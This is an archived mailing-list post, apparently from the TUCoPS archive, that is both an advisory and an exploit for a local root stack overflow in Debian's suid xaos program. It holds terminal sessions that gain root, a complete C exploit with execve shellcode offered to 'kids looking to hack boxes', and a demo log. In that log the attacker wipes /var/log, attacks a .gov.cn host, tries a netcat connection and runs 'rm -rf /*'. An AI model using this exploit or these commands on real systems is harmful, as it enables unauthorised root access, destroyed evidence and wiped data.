Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Debian :: debroot.txt

Debian Local Root Exploit




------=_Part_3705_33550467.1054852043280
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

bazarr!
------=_Part_3705_33550467.1054852043280
Content-Type: text/x-csrc; name=bazarr-episode-4.c
Content-Transfer-Encoding: quoted-printable
Content-Disposition: ATTACHMENT; filename=bazarr-episode-4.c

/* xaos <=3D 3.0-23 ? 0day local root xploit on debian 3.0 whoody =
*/
/* by: bazarr =
*/
/* bazarr@ziplip.com <mailto:bazarr@ziplip.com> =
*/
/* =09bazarr episode #4=09=09=09=09=09=09 *=20
=09=09=09=09=09=09=09=09=09=09

*hendy* i dont build nests for da winter, cause i dont have no time for bui=
lding nests

dis is da advisory and xploit at da same time for a local root hole in debi=
an 3.0.=20
if dave censor dis he out of his mind! dis my second local root xploit in a=
week!
when bugtraq be heading down south to county jail quick wid all da cross si=
te scripting bugs
and advisorys for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets be re=
al about dis
advisorys for non popular software are a dime a dozen. i da first young boy=
to come around=20
wid real advisorys in many a months. so please gimmie small break.=20

i release more advisorys den combined times dvdfairy has DoS'd phrack.ru

dats alot!

--- You have been kicked from #openbsd by Dianora
(I have been coding before you were even a glint in your fathers eye. go aw=
ay)

dianora when i finish "da design and implementation of da 4.4bsd operating =
system" (A BOOK)
i be back to challenge you on bsd kernel , den you have no choice but to le=
t me stay and give me +v in #openbsd.
thank you. (she kicked young 16 year old boy out of channel for xposing rem=
ote hole in default install!)=20

ok lets take a look at the vendor info for xaos:

DESCRIPTION
XaoS is a protable real-time interactive fractal zoomer/morpher. U=
NIX version works under X11, SVGA and text terminals. If you don't knwo wh=
at fractal is or you want
to know more about XaoS features you should see animated tutorial. =
Run XaoS and press 'H' twice. It is much more fun than reading of boring =
manual page :) and it
supports foregin languages. You might also read xaos.info file for =
some advanced stuff (like how to write animations and tutorials manually, p=
ort or extend XaoS, algo=AD
rithms used etc.)

first thing dat i spot is spelling mistake please patch 'knwo' into 'no' as=
ap.

so we know dat xaos is a program which you zoom around in when you get real=
stoned(seriously).=20
lets get to da local root hole in xaos.=20

lets take a look at my terminal session wid xaos:=20

c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> ls -al xaos
ls: xaos: No such file or directory
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #well it aint here so lemme get back to da irc=20
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #wait a second! i got an idea
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> ls -al /usr/bin/xaos=20
-rwsr-xr-x 1 root root 379324 Apr 3 2001 /usr/bin/xaos
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #suid root?! dat mean if it xploited it will resul=
t in uid =3D 0=20
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #what will i do now?

now what i be doin is dis , bare wid me here fellow security researches (lc=
amtuf you able to keep up wid dis?)=20
lets keep going into dis adventure, lets check if you be vulnerable

c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #ok now we be checking if dis xaos is vulnerable t=
o 0day bug which i have discovered=20
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> /usr/bin/xaos -language `perl -e 'print "A"x2049'`
^C
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #ok im not vulnerable i guess
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #w8 i have an idea!
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> /usr/bin/xaos -language `perl -e 'print "A"x20049'=
`
Segmentation fault
c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #aww crap i be vulnerable , what now?


after auditing for many a days and many a nights to find dis bug i am still=
weary from all of it.=20
so lemme try and keep on going through dis adventure wid xaos, lets try and=
xploit it dis time.=20

c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> ./set #dis put shellcode in enviroment with many a=
0x90 around it=20
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809=
6'` -display A
Segmentation fault
[c00l:dump]$ #its not xploitable i guess=20
[c00l:dump]$ #w8 i got an idea
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809=
6'` -display AA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809=
6'` -display AAA
Segmentation fault
[c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809=
6'` -display AAAA
sh-2.05a# id ; uname -a
uid=3D1001(c00l) gid=3D1001(c00l) euid=3D0(root) groups=3D1001(c00l)
Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown
sh-2.05a# # I DID IT=20
sh-2.05a# exit =20
exit
[c00l:dump]$ #be ethical and just run uname ; id and exit , thanks!

woa dis be going too fast for some security researchers let me slow down an=
d xplain dis.=20

xaos be doing somthing like dis wid its -language argument=20

++++++++
char hoolio[4096]; //big as to not allow stack overflow

strcpy(hoolio,argv[i]) //secure
++++++++

but it is NOT secure , a attacker is able to overflow 'hoolio' wid his own =
data!
den he overwrite da saved return address on da stack with his own and den h=
e execute a shell.=20

-------------
ENDING=20

xaos is vulnerable to a stack buffer overflow which be yeilding root privle=
ges on debian 3.0 (w00dy)=20

-------------=09
PATCH

see many a people dont understand dis issue, i am young highschool boy=20
doing many a bleeding edge freelance security work for free , it not my job=
to provide patch=20
and pamper you. but if you really dont want to get hacked with many a 0day =
xploits just dont go online
and dont make fun of caddis cuz he be xploiting your ftpd in record time to=
rm you(seriously man).=20

-------------=09
VENDORS NOTIFYED

none

-------------=09
VENDORS VULNERABLE

debain 3.0 & unstable on default install!!!
FreeBSD x.x ports!=20
OpenBSD x.x ports!
NetBSD x.x ports!!!=20
anyone who installed xaos!

-------------
XPLOIT=20

as i promised , dis is da xploit!. if my code looks hoodly poodly its cuz=
=20
i have trouble programming after last nights crystal meth ride.=20

demonstation:

[pan@****.kr]$ cc bazarr-episode-4.c
[pan@****.kr]$ ./a.out aaaa
[*] bazarr :)
sh-2.05a# id
uid=3D1003(pan) gid=3D1003(pan) euid=3D0(root) groups=3D1003(pan)
sh-2.05a# rm -rf /var/log=20
sh-2.05a# cc b.c=20
sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b=20
.... ..... .... .... .... ....
done.=20
sh-2.05a# nc ****.xxtax.gov.cn 31337
sh: nc: command not found
sh-2.05a# rm -rf /* & exit

just compile and run!!! so user friendly its not even funny!
the 'a's are stack padding for da xaos , try 1-4 'a's
woa hey i just made a fool of myself! i dident need any stack padding there=
.

dis C-code is very complex , do not attempt to modify it.=20

it is very user friendly though for da following groups:

1. 22 year old php programming cs students
2. younger kids looking to hack boxes! (I LOVE DIS GROUP)
3. professional security researches to make money off highschool boy by usi=
ng dis xploit on der clients and charging dem for it
4. elite lurking blackhat laughing at my codez! (I CANT SAY I LIKE DIS GROU=
P ALL DAT MUCH)=20

AND NOW THE WORLDS FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR

*/

char c[] =3D "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x0b\x99\x52\x68\=
x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int main(int cc,char **a) {char x[256];char b[72000];memset(b,0x99,sizeof(b=
));;;memcpy(b+71968,c,strlen(c));/**/;;b[sizeof(b)]=3D0;;setenv("C",b,1);
if (!a[1]){printf("[*] bazarr :(\n");exit(1);};/**/;;sprintf(x,"/usr/bin/xa=
os -language `perl -e 'print=20
\"\x45\xfe\xfe\xbf\"x8096'` -display %s",a[1]);;;printf("[*] bazarr :)\n");=
system(x);}

/*=20


-------------
ADVANCE WARNING=20

double free() bug in popular suid root application installed by default on =
debian 3.0 comming soon!
remote xploit for debian application comming soon!

and so many more i cannot even list dem all(SERIOUSLY).=20

16 year old boy release more bugs in few weeks den your whole crew does in =
da last 5 years!
i think most of you be a little bitter about dat and dats why you some of y=
ou be anti bazarr.=20
your company should stick to hoolio's ftpd server.=20

-------------
GREETS

sir hackalot - you cool man! you like the 2pac of hacking. what ever happen=
d to you and PHAZE? it been awhile!

-------------
BYE

bye bye guys i gotta go feed the dog and work on math homework.

bye.

-bazarr


*/














------=_Part_3705_33550467.1054852043280--



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH